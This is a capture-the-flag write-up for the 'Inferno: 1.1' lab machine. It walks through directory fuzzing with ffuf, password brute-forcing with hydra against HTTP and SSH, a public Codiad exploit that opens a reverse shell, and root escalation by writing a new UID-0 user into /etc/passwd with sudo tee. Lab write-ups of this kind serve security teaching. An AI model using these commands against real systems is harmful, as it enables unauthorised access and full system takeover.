Last updated: 15 Apr 24 09:31:04 (UTC)
Write-Up Inferno
Inferno
By Lawcky 01/01/2024
Introduction
Real Life machine vs CTF
Difficulty : easy-medium
Additionnal info :
Name: Inferno: 1.1
Release date: 6 Dec 2020
Author: mindsflee
Series: Inferno
|NOTE| if you want to see all the scans we wont copy them here as they would be way too voluminous, click here to see them
In this write-up
- hydra
- ffuf
- tee
- python
- nmap
Write-UP
first approach
web page is empty
ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.10/FUZZ
found 192.168.1.10/inferno with a password login
hydra -l admin -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt 192.168.1.10 http-get /inferno/ -I
admin:dante1
its a codiad ==> https://www.exploit-db.com/exploits/49705
wget https://www.exploit-db.com/exploits/49705
python3 codiad.py http://192.168.1.10 admin dante1 192.168.1.253 1234 did not work
python /snap/searchsploit/399/opt/exploitdb/exploits/multiple/webapps/49705.py http://admin:dante1@192.168.1.10/inferno/ admin dante1 192.168.1.253 1234 linux
works to connect to a page this way too
we now know about the dante user for ssh
hydra -l dante -P /usr/share/SecLists/Passwords/Leaked-Databases/rockyou.txt ssh://192.168.1.10/
while this runs we look around for interesting files.
there’s a hidden file in the Download dir of dante
cat /home/dante/Download/.download.dat
its hex character representing ascii, once translated the end is : dante:V1rg1l10h3lpm3 <== ssh password
77f6f3c544ec0811e2d1243e2e0d1835
first flag found next one is root user
Privilege Escalation
sudo -l
===> https://gtfobins.github.io/gtfobins/tee/
with this we can try to create a root user and add it directly into the /etc/passwd file
openssl passwd -1
echo 'pwn:$1$L8NTO40O$xtQpcAcFWpkcKkQf8KxAM:0:0:pwned:/root:/bin/bash' | sudo tee -a /etc/passwd
it worked
77f6f3c544ec0811e2d1243e2e0d1835
second flag found !